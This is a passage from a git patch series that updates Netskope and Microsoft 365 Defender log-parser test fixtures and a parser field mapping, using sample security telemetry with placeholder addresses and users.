1671639139,\n  \"conn_duration\": 3,\n  \"protocol\": \"\",\n  \"fromlogs\": \"\",\n  \"serial\": \"\",\n  \"resp_content_len\": 0,\n  \"dynamic_classification\": \"\",\n  \"hostname\": \"\",\n  \"os\": \"\",\n  \"server_bytes\": 0,\n  \"conn_starttime\": 1671639136,\n  \"sessionid\": \"\",\n  \"resp_content_type\": \"\"\n}\n",
     "event": {
-      "action": "Allow",
       "category": [
         "network"
       ],
@@ -20,6 +19,9 @@
       ]
     },
     "@timestamp": "2022-12-21T16:12:20Z",
+    "action": {
+      "name": "Allow"
+    },
     "destination": {
       "address": "5.6.7.8",
       "bytes": 0,
diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json
index 37ab6e32b..b3cb772d3 100644
--- a/Netskope/netskope_events/tests/test_dlp_incident.json
+++ b/Netskope/netskope_events/tests/test_dlp_incident.json
@@ -16,6 +16,9 @@
       ]
     },
     "@timestamp": "2023-01-31T08:11:53Z",
+    "action": {
+      "name": "Allow"
+    },
     "cloud": {
       "instance": {
         "id": "example.org"
diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json
index 5e5f6de15..e1a0a66c5 100644
--- a/Netskope/netskope_events/tests/test_malware_alert.json
+++ b/Netskope/netskope_events/tests/test_malware_alert.json
@@ -5,7 +5,7 @@
   "expected": {
     "message": "{\n  \"_id\": \"882049056ee9e069c1c329b7\",\n  \"access_method\": \"Client\",\n  \"action\": \"Detection\",\n  \"activity\": \"Download\",\n  \"alert\": \"yes\",\n  \"alert_type\": \"Malware\",\n  \"app\": \"eicar\",\n  \"app_session_id\": 111111111111111111,\n  \"appcategory\": \"n/a\",\n  \"browser\": \"Safari\",\n  \"category\": \"n/a\",\n  \"cci\": \"\",\n  \"ccl\": \"unknown\",\n  \"connection_id\": 0,\n  \"count\": 1,\n  \"device\": \"Mac Device\",\n  \"dst_country\": \"US\",\n  \"dst_geoip_src\": 2,\n  \"dst_latitude\": 47.6711,\n  \"dst_location\": \"Redmond\",\n  \"dst_longitude\": -122.1253,\n  \"dst_region\": \"Washington\",\n  \"dst_timezone\": \"America/Los_Angeles\",\n  \"dst_zipcode\": \"98073\",\n  \"dstip\": \"5.6.7.8\",\n  \"file_path\": \"NA\",\n  \"file_size\": 308,\n  \"file_type\": \"File Type Not Detected\",\n  \"hostname\": \"MacBook Pro\",\n  \"instance\": null,\n  \"managementID\": \"99999999999999999999999999999999\",\n  \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n  \"mime_type\": \"\",\n  \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n  \"object\": \"eicarcom2.zip\",\n  \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n  \"object_type\": \"File\",\n  \"organization_unit\": \"\",\n  \"os\": \"Monterey\",\n  \"referer\": \"https://www.eicar.org/\",\n  \"request_id\": 2222222222222222222,\n  \"severity\": \"high\",\n  \"site\": \"eicar\",\n  \"src_country\": \"FR\",\n  \"src_geoip_src\": 2,\n  \"src_latitude\": 48.11,\n  \"src_location\": \"Rennes\",\n  \"src_longitude\": -1.6744,\n  \"src_region\": \"Brittany\",\n  \"src_timezone\": \"Europe/Paris\",\n  \"src_zipcode\": \"35000\",\n  \"srcip\": \"4.3.2.1\",\n  \"timestamp\": 1671631928,\n  \"title\": \"eicarcom2.zip\",\n  \"traffic_type\": \"CloudApp\",\n  \"transaction_id\": 3333333333333333333,\n  \"tss_mode\": \"inline\",\n  \"type\": \"nspolicy\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"url\": \"secure.eicar.org/eicarcom2.zip\",\n  \"user\": \"john.doe@example.org\",\n  \"user_id\": \"john.doe@example.org\",\n  \"userip\": \"1.2.3.4\",\n  \"userkey\": \"john.doe@example.org\",\n  \"dlp_file\": \"\",\n  \"data_center\": \"\",\n  \"browser_version\": \"\",\n  \"owner\": \"\",\n  \"dlp_incident_id\": 0,\n  \"channel_id\": \"\",\n  \"from_user_category\": \"\",\n  \"resp_cnt\": 0,\n  \"suppression_key\": \"\",\n  \"loginurl\": \"\",\n  \"total_collaborator_count\": 0,\n  \"os_version\": \"\",\n  \"dlp_rule\": \"\",\n  \"dlp_mail_parent_id\": \"\",\n  \"instance_id\": \"\",\n  \"to_user\": \"\",\n  \"suppression_end_time\": 0,\n  \"fromlogs\": \"\",\n  \"dlp_parent_id\": 0,\n  \"dstport\": 0,\n  \"dst_timezone\": \"\",\n  \"serial\": \"\",\n  \"audit_category\": \"\",\n  \"sha256\": \"\",\n  \"from_user\": \"\",\n  \"sAMAccountName\": \"\",\n  \"app_activity\": \"\",\n  \"useragent\": \"\",\n  \"netskope_activity\": \"\",\n  \"conn_duration\": 0,\n  \"other_categories\": [],\n  \"custom_connector\": \"\",\n  \"dlp_rule_severity\": \"\",\n  \"numbytes\": 0,\n  \"telemetry_app\": \"\",\n  \"true_obj_category\": \"\",\n  \"userPrincipalName\": \"\",\n  \"logintype\": \"\",\n  \"suppression_start_time\": 0,\n  \"browser_session_id\": 0,\n  \"dlp_profile\": \"\",\n  \"src_time\": \"\",\n  \"modified\": 0,\n  \"policy\": \"\",\n  \"policy_id\": \"\",\n  \"notify_template\": \"\",\n  \"audit_type\": \"\",\n  \"orignal_file_path\": \"\",\n  \"dlp_is_unique_count\": \"\",\n  \"org\": \"\",\n  \"user_category\": \"\",\n  \"dlp_unique_count\": 0,\n  \"exposure\": \"\",\n  \"netskope_pop\": \"\",\n  \"shared_with\": \"\",\n  \"client_bytes\": 0,\n  \"sanctioned_instance\": \"\",\n  \"device_classification\": \"\",\n  \"data_type\": \"\",\n  \"scan_type\": \"\",\n  \"internal_collaborator_count\": 0,\n  \"CononicalName\": \"\",\n  \"workspace\": \"\",\n  \"log_file_name\": \"\",\n  \"parent_id\": \"\",\n  \"true_obj_type\": \"\",\n  \"dlp_rule_count\": 0,\n  \"sessionid\": \"\",\n  \"workspace_id\": \"\",\n  \"page_site\": \"\",\n  \"universal_connector\": \"\",\n  \"server_bytes\": 0,\n  \"req_cnt\": 0,\n  \"file_lang\": \"\",\n  \"protocol\": \"\",\n  \"web_universal_connector\": \"\",\n  \"dsthost\": \"\",\n  \"appsuite\": \"\",\n  \"managed_app\": \"\",\n  \"page\": \"\"\n}\n",
     "event": {
-      "action": "Detection",
+      "action": "Download",
       "category": [
         "malware"
       ],
@@ -17,6 +17,9 @@
       ]
     },
     "@timestamp": "2022-12-21T14:12:08Z",
+    "action": {
+      "name": "Detection"
+    },
     "destination": {
       "address": "5.6.7.8",
       "bytes": 0,
diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json
index 0d739d4fd..404b5d4ab 100644
--- a/Netskope/netskope_events/tests/test_nspolicy_block.json
+++ b/Netskope/netskope_events/tests/test_nspolicy_block.json
@@ -11,7 +11,7 @@
   "expected": {
     "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}",
     "event": {
-      "action": "block",
+      "action": "Browse",
       "category": [
         "network"
       ],
@@ -23,6 +23,9 @@
       ]
     },
     "@timestamp": "2024-11-14T09:01:32Z",
+    "action": {
+      "name": "block"
+    },
     "destination": {
       "address": "1.2.3.4",
       "bytes": 0,
diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json
index d0d9ed304..412ece514 100644
--- a/Netskope/netskope_events/tests/test_nspolicy_log.json
+++ b/Netskope/netskope_events/tests/test_nspolicy_log.json
@@ -17,6 +17,9 @@
       ]
     },
     "@timestamp": "2022-12-21T15:52:00Z",
+    "action": {
+      "name": "Allow"
+    },
     "cloud": {
       "instance": {
         "id": "Example"
diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json
index b05f61a9d..314e7d7e1 100644
--- a/Netskope/netskope_events/tests/test_nspolicy_upload.json
+++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json
@@ -23,6 +23,9 @@
       ]
     },
     "@timestamp": "2024-11-14T09:04:46Z",
+    "action": {
+      "name": "Allow"
+    },
     "destination": {
       "address": "1.2.3.4",
       "bytes": 0,
diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json
index 4c435b860..bb5831a9c 100644
--- a/Netskope/netskope_events/tests/test_user_alert.json
+++ b/Netskope/netskope_events/tests/test_user_alert.json
@@ -5,7 +5,7 @@
   "expected": {
     "message": "{\n  \"_id\": \"882049056ee9e069c1c329b7\",\n  \"access_method\": \"Client\",\n  \"action\": \"useralert\",\n  \"activity\": \"Share\",\n  \"alert\": \"yes\",\n  \"app\": \"WeTransfer\",\n  \"app_session_id\": 1111111111111111111,\n  \"appcategory\": \"Cloud Storage\",\n  \"browser\": \"Edge\",\n  \"browser_session_id\": 2222222222222222222,\n  \"browser_version\": \"108.0.1462.54\",\n  \"category\": \"Cloud Storage\",\n  \"cci\": 58,\n  \"ccl\": \"low\",\n  \"connection_id\": 3333333333333333333,\n  \"count\": 1,\n  \"device\": \"Windows Device\",\n  \"device_classification\": \"unmanaged\",\n  \"dst_country\": \"IE\",\n  \"dst_geoip_src\": 2,\n  \"dst_latitude\": 53.3379,\n  \"dst_location\": \"Dublin\",\n  \"dst_longitude\": -6.2591,\n  \"dst_region\": \"Leinster\",\n  \"dst_timezone\": \"Europe/Dublin\",\n  \"dst_zipcode\": \"D02\",\n  \"dstip\": \"108.128.91.183\",\n  \"from_user\": \"jane.doe@example.org\",\n  \"hostname\": \"TEST-1234\",\n  \"managed_app\": \"no\",\n  \"managementID\": \"99999999999999999999999999999999\",\n  \"netskope_pop\": \"FR-PAR1\",\n  \"notify_template\": \"useralert_justify.html\",\n  \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n  \"object\": \"Client.exe\",\n  \"object_type\": \"File\",\n  \"organization_unit\": \"\",\n  \"os\": \"Windows 11\",\n  \"os_version\": \"Windows 11\",\n  \"page\": \"wetransfer.com/\",\n  \"page_site\": \"Web Background\",\n  \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n  \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n  \"protocol\": \"HTTPS/2\",\n  \"referer\": \"https://wetransfer.com/\",\n  \"request_id\": 4444444444444444444,\n  \"severity\": \"unknown\",\n  \"site\": \"WeTransfer\",\n  \"src_country\": \"FR\",\n  \"src_geoip_src\": 2,\n  \"src_latitude\": 48.11,\n  \"src_location\": \"Rennes\",\n  \"src_longitude\": -1.6744,\n  \"src_region\": \"Brittany\",\n  \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n  \"src_timezone\": \"Europe/Paris\",\n  \"src_zipcode\": \"35000\",\n  \"srcip\": \"4.3.2.1\",\n  \"telemetry_app\": \"\",\n  \"timestamp\": 1671634321,\n  \"to_user\": \"a@a.fr\",\n  \"traffic_type\": \"CloudApp\",\n  \"transaction_id\": 4444444444444444444,\n  \"type\": \"nspolicy\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"url\": \"wetransfer.com/api/v4/transfers/email\",\n  \"user\": \"john.doe@example.org\",\n  \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n  \"userip\": \"1.2.3.4\",\n  \"userkey\": \"john.doe@example.org\",\n  \"internal_collaborator_count\": 0,\n  \"fromlogs\": \"\",\n  \"dlp_incident_id\": 0,\n  \"owner\": \"\",\n  \"dlp_profile\": \"\",\n  \"workspace\": \"\",\n  \"user_id\": \"\",\n  \"userPrincipalName\": \"\",\n  \"true_obj_category\": \"\",\n  \"dlp_is_unique_count\": \"\",\n  \"orignal_file_path\": \"\",\n  \"other_categories\": [],\n  \"serial\": \"\",\n  \"tss_mode\": \"\",\n  \"conn_duration\": 0,\n  \"from_user_category\": \"\",\n  \"md5\": \"\",\n  \"data_type\": \"\",\n  \"title\": \"\",\n  \"log_file_name\": \"\",\n  \"dstport\": 0,\n  \"exposure\": \"\",\n  \"instance_id\": \"\",\n  \"audit_category\": \"\",\n  \"netskope_activity\": \"\",\n  \"file_type\": \"\",\n  \"total_collaborator_count\": 0,\n  \"file_path\": \"\",\n  \"modified\": 0,\n  \"dlp_rule_count\": 0,\n  \"suppression_end_time\": 0,\n  \"CononicalName\": \"\",\n  \"alert_type\": \"\",\n  \"sanctioned_instance\": \"\",\n  \"suppression_start_time\": 0,\n  \"dlp_parent_id\": 0,\n  \"true_obj_type\": \"\",\n  \"dlp_mail_parent_id\": \"\",\n  \"audit_type\": \"\",\n  \"workspace_id\": \"\",\n  \"dsthost\": \"\",\n  \"web_universal_connector\": \"\",\n  \"req_cnt\": 0,\n  \"mime_type\": \"\",\n  \"suppression_key\": \"\",\n  \"scan_type\": \"\",\n  \"shared_with\": \"\",\n  \"client_bytes\": 0,\n  \"object_id\": \"\",\n  \"user_category\": \"\",\n  \"dlp_rule\": \"\",\n  \"parent_id\": \"\",\n  \"sha256\": \"\",\n  \"dlp_rule_severity\": \"\",\n  \"logintype\": \"\",\n  \"org\": \"\",\n  \"dlp_unique_count\": 0,\n  \"file_size\": 0,\n  \"instance\": \"\",\n  \"sAMAccountName\": \"\",\n  \"resp_cnt\": 0,\n  \"universal_connector\": \"\",\n  \"numbytes\": 0,\n  \"server_bytes\": 0,\n  \"channel_id\": \"\",\n  \"file_lang\": \"\",\n  \"app_activity\": \"\",\n  \"appsuite\": \"\",\n  \"sessionid\": \"\",\n  \"loginurl\": \"\",\n  \"dlp_file\": \"\",\n  \"data_center\": \"\",\n  \"custom_connector\": \"\"\n}\n",
     "event": {
-      "action": "useralert",
+      "action": "Share",
       "category": [
         "network"
       ],
@@ -17,6 +17,9 @@
       ]
     },
     "@timestamp": "2022-12-21T14:52:01Z",
+    "action": {
+      "name": "useralert"
+    },
     "destination": {
       "address": "108.128.91.183",
       "bytes": 0,

From 9264ef70512e299c783d05b43afb38dacd4c3431 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?L=C3=A9na=C3=AFg?=
 <126670263+LenaigKaliou@users.noreply.github.com>
Date: Thu, 28 Nov 2024 10:25:08 +0100
Subject: [PATCH 292/317] Update
 Microsoft/microsoft-365-defender/ingest/parser.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Sébastien Quioc <sebastien.quioc@sekoia.fr>
---
 Microsoft/microsoft-365-defender/ingest/parser.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index fc32171cd..d212bdb11 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -267,7 +267,8 @@ stages:
           action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
           action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
           action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
-          action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
+          action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+          action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
           action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
           action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
           action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"

From a4b94af6afa920ba08482254408c406c0ef90db6 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 28 Nov 2024 11:57:27 +0100
Subject: [PATCH 293/317] Correction of overwrited test file

---
 .../tests/test_device_process_events_2.json   | 114 ++++++------------
 1 file changed, 36 insertions(+), 78 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index cab75fb0a..9b0327128 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
@@ -1,6 +1,6 @@
 {
   "input": {
-    "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}",
+    "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, 